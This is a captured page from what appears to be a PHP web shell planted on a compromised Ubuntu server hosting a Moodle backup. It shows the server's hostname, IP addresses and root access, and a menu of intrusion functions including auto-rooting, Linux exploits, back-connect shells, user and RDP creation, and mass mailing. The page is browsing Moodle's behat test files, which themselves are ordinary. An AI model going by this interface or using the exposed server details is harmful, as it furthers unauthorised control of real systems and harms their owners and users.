Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
lib /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
action_menu.feature
1.14
KB
-rw-rw-r--
alpha_chooser.feature
21.56
KB
-rw-rw-r--
behat_action_menu.php
3.16
KB
-rw-rw-r--
behat_data_generators.php
29.19
KB
-rw-rw-r--
behat_deprecated.php
4.69
KB
-rw-rw-r--
behat_filters.php
2.95
KB
-rw-rw-r--
behat_forms.php
21.45
KB
-rw-rw-r--
behat_general.php
74.59
KB
-rw-rw-r--
behat_hooks.php
25.6
KB
-rw-rw-r--
behat_navigation.php
25.91
KB
-rw-rw-r--
behat_permissions.php
10.3
KB
-rw-rw-r--
behat_transformations.php
5.93
KB
-rw-rw-r--
largeforms.feature
4.46
KB
-rw-rw-r--
readonlyform.feature
1.64
KB
-rw-rw-r--
timezone.feature
438
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : action_menu.feature
@core Feature: Navigate action menu In order to navigate an action menu As a user I need to be able to use the keyboard @javascript Scenario: The menu does not close on keyboard navigation When I log in as "admin" # Click to open the user menu. And I click on ".usermenu a.toggle-display" "css_element" in the ".usermenu" "css_element" # The menu should now be visible. Then ".usermenu [role='menu']" "css_element" should be visible # Press down arrow. And I press key "40" in "#actionmenuaction-1" "css_element" # The menu should still be visible. And ".usermenu [role='menu']" "css_element" should be visible @javascript Scenario: The menu closes when it clicked outside When I log in as "admin" # Click to open the user menu. And I click on ".usermenu a.toggle-display" "css_element" in the ".usermenu" "css_element" # The menu should now be visible. Then ".usermenu [role='menu']" "css_element" should be visible # Click outside the menu. And I click on "adminsearchquery" "field" # The menu should now be hidden. And ".usermenu [role='menu']" "css_element" should not be visible
Close